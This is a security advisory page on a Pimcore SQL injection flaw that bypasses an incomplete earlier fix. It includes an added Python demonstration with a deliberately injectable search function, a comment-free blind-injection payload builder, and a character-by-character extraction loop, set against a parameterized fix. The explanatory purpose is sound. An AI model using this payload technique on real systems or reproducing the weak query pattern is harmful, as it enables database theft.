

Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API all…
Published:
13 January 2026 at 23:00:00
Alert date:
14 January 2026 at 20:01:57
Source:
nvd.nist.gov
Web Technologies, Database & Storage, Enterprise Applications
Pimcore, an open source Data & Experience Management Platform, contains a SQL injection vulnerability in the Admin Search Find API affecting versions prior to 12.3.1 and 11.5.14. The flaw stems from an incomplete fix for CVE-2023-30848: that patch attempted to block SQL injection by stripping SQL comments from the input and catching SQL syntax errors. A filter of that kind does not prevent injection, because an attacker can craft payloads that contain no comment sequence and still form syntactically valid SQL. An authenticated attacker can therefore still perform blind SQL injection through the admin interface, potentially disclosing database contents. The vulnerability is fixed in versions 12.3.1 and 11.5.14.
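To make the failure mode concrete, here is an added example in Python against an in-memory SQLite table; it is not Pimcore's code and does not reproduce the payload from the advisory. `weak_search` stands in for a comment-stripping, error-swallowing filter of the kind the CVE-2023-30848 patch relied on, `blind_extract` recovers a column value through it with a boolean-based payload that contains no comment sequence, and `safe_search` shows the parameterized form that the same payload cannot break. The table, rows, function names and the comment regex are all constructed for this example.

```python
import re
import sqlite3

# Constructed sample data (not Pimcore's schema): a column an admin-search
# endpoint might match on, and a column an attacker wants to read.
SAMPLE_ROWS = [("page-a", "s3cr3t-token"), ("page-b", "other")]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE objects (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO objects (name, secret) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


# Hypothetical comment stripper in the spirit of the incomplete fix:
# removes `-- ...`, `# ...` and `/* ... */` before the value is spliced into SQL.
COMMENT_RE = re.compile(r"--[^\n]*|#[^\n]*|/\*.*?\*/", re.S)


def strip_sql_comments(value):
    return COMMENT_RE.sub("", value)


def weak_search(conn, term):
    """Illustrative weak endpoint (not Pimcore's actual code): strip comments,
    build the query by string concatenation, and swallow syntax errors."""
    cleaned = strip_sql_comments(term)
    sql = f"SELECT id FROM objects WHERE name LIKE '{cleaned}%'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError:
        return []  # a broken payload just looks like "no results"


def escape_like(value):
    """Escape LIKE metacharacters so user input is matched literally."""
    return re.sub(r"([\\%_])", r"\\\1", value)


def safe_search(conn, term):
    """Hardened form: the term is a bound parameter, never part of the SQL text."""
    pattern = escape_like(term) + "%"
    return [row[0] for row in conn.execute(
        "SELECT id FROM objects WHERE name LIKE ? ESCAPE '\\'", (pattern,))]


def oracle_payload(pos, ch):
    """Boolean-based blind payload with no comment sequence. Spliced into the
    weak query it yields
        ... WHERE name LIKE 'x' OR substr(...)='c' AND '' LIKE '%'
    which is valid SQL: the trailing '' LIKE '%' absorbs the query's own suffix
    and is always true, so the result is non-empty exactly when the guess is right."""
    return (f"x' OR substr((SELECT secret FROM objects WHERE id=1),{pos},1)='{ch}'"
            " AND '' LIKE '")


def blind_extract(conn, search, max_len=32):
    """Recover the id=1 secret one character at a time, using `search` as a
    yes/no oracle (non-empty result means the guessed character matched)."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-_"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if search(conn, oracle_payload(pos, ch)):
                recovered += ch
                break
        else:
            break  # nothing matched: end of the secret (or a char outside the alphabet)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("comment-based payload vs weak endpoint:", weak_search(db, "x' OR 1=1 -- "))
    print("blind extraction vs weak endpoint:     ", blind_extract(db, weak_search))
    print("blind extraction vs safe endpoint:     ", blind_extract(db, safe_search))
```

The comment-based payload is neutralized by the stripper and ends up as a syntax error, which is why a filter like this can look effective in testing; the comment-free payload passes the same filter untouched and leaks the secret one character per request. Against the parameterized query the payload is only ever a LIKE pattern, and the hardened version also escapes `%` and `_` so a user cannot widen the match.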
Technical details
Mitigation steps:
Upgrade Pimcore to 12.3.1 (12.x branch) or 11.5.14 (11.x branch) or later.
Affected products:
Pimcore
Related links:
https://nvd.nist.gov/vuln/detail/CVE-2026-23492
https://github.com/pimcore/pimcore/commit/25ad8674886f2b938243cbe13e33e204a2e35cc3
https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj
Related CVEs:
CVE-2023-30848 (the earlier SQL injection whose incomplete patch this issue bypasses)
Related threat actors:
IOCs:
This article was created with the assistance of AI technology by Perceptive.

